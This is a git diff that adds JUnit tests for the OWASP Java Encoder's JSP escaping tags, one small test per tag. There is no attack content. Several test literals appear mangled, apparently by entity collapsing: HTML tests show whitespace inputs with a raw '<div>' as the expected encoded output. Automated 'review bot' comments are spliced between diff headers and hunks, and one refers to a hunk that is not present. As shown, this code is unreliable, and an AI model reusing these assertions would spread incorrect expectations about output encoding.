diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java
new file mode 100644
index 0000000..3c0c64f
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlAttributeTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlAttributeTagTest extends EncodingTagTest {
+
+ public ForHtmlAttributeTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForHtmlAttributeTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForHtmlAttributeTag instance = new ForHtmlAttributeTag();
+ String value = "
    ";
+ String expected = "<div>";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java
new file mode 100644
index 0000000..ef6e389
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlContentTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlContentTagTest extends EncodingTagTest {
+
+ public ForHtmlContentTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForHtmlContentTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForHtmlContentTag instance = new ForHtmlContentTag();
+ String value = "
    ";
+ String expected = "<div>";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java
new file mode 100644
index 0000000..03897a7
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlTagTest extends EncodingTagTest {
+
+ public ForHtmlTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForHtmlTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForHtmlTag instance = new ForHtmlTag();
+ String value = "
    ";
+ String expected = "<div>";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java
new file mode 100644
index 0000000..bce53a4
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlUnquotedAttributeTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlUnquotedAttributeTagTest extends EncodingTagTest {
+
+ public ForHtmlUnquotedAttributeTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForHtmlUnquotedAttributeTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForHtmlUnquotedAttributeTag instance = new ForHtmlUnquotedAttributeTag();
+ String value = "
    ";
+ String expected = "<div> </div>";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java
new file mode 100644
index 0000000..ad38c07
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptAttributeTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptAttributeTagTest extends EncodingTagTest {
+
+ public ForJavaScriptAttributeTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForJavaScriptAttributeTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForJavaScriptAttributeTag instance = new ForJavaScriptAttributeTag();
+ String value = "
    \"\'";
+ String expected = "
    \\x22\\x27";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java
new file mode 100644
index 0000000..75cf97e
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptBlockTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptBlockTagTest extends EncodingTagTest {
+
+ public ForJavaScriptBlockTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForJavaScriptBlockTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForJavaScriptBlockTag instance = new ForJavaScriptBlockTag();
+ String value = "'\"\0";
+ String expected = "\\'\\\"\\x00";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java
new file mode 100644
index 0000000..0ea95fc
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptSourceTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptSourceTagTest extends EncodingTagTest {
+
+ public ForJavaScriptSourceTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForJavaScriptSourceTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForJavaScriptSourceTag instance = new ForJavaScriptSourceTag();
+ String value = "\0'\"";
+ String expected = "\\x00\\'\\\"";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java
new file mode 100644
index 0000000..2d4f67a
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java
@@ -0,0 +1,46 @@
+/*
+ * To change this template, choose Tools | Templates
+ * and open the template in the editor.
+ */
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptTagTest extends EncodingTagTest {
+
+ public ForJavaScriptTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForJavaScriptTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForJavaScriptTag instance = new ForJavaScriptTag();
+ String value = "\0'\"";
+ String expected = "\\x00\\x27\\x22";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java
new file mode 100644
index 0000000..3d9d11c
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java
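Review bot: ForJavaScriptTagTest opens with the IDE template placeholder (`To change this template, choose Tools | Templates ... open the template in the editor`) instead of the BSD license header that every other test file added in this commit carries, so this one file's licensing is left implicit; the four-line placeholder should be replaced with the same copyright block used in ForJavaScriptSourceTagTest and its siblings. Apart from the header the file has the same shape as the others, so the remarks made on the ForCDATATagTest hunk apply here as well.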
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForUriComponentTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriComponentTagTest extends EncodingTagTest {
+
+ public ForUriComponentTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForUriComponentTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForUriComponentTag instance = new ForUriComponentTag();
+ String value = "&=test";
+ String expected = "%26amp%3B%3Dtest";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java
new file mode 100644
index 0000000..ac16812
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java
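Review bot: The `value`/`expected` pair in ForUriComponentTagTest does not line up as displayed: a URI-component encoder maps `&` to `%26` and `=` to `%3D`, so `"&=test"` cannot produce `"%26amp%3B%3Dtest"`; that expected string is what `"&amp;=test"` encodes to. The pair is consistent if the checked-in file actually reads `String value = "&amp;=test";` and the entity was collapsed when this page was rendered, which is worth confirming against the source — if the literal really is `&=test` the assertion fails. Either way a comment on the `value` line naming the intent, such as `// an already HTML-escaped ampersand must be percent-encoded byte-for-byte`, would stop the next reader from "correcting" the expected string.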
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForUriTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriTagTest extends EncodingTagTest {
+
+ public ForUriTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForUriTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForUriTag instance = new ForUriTag();
+ String value = "\\\"";
+ String expected = "%5C%22";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java
new file mode 100644
index 0000000..4246516
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java
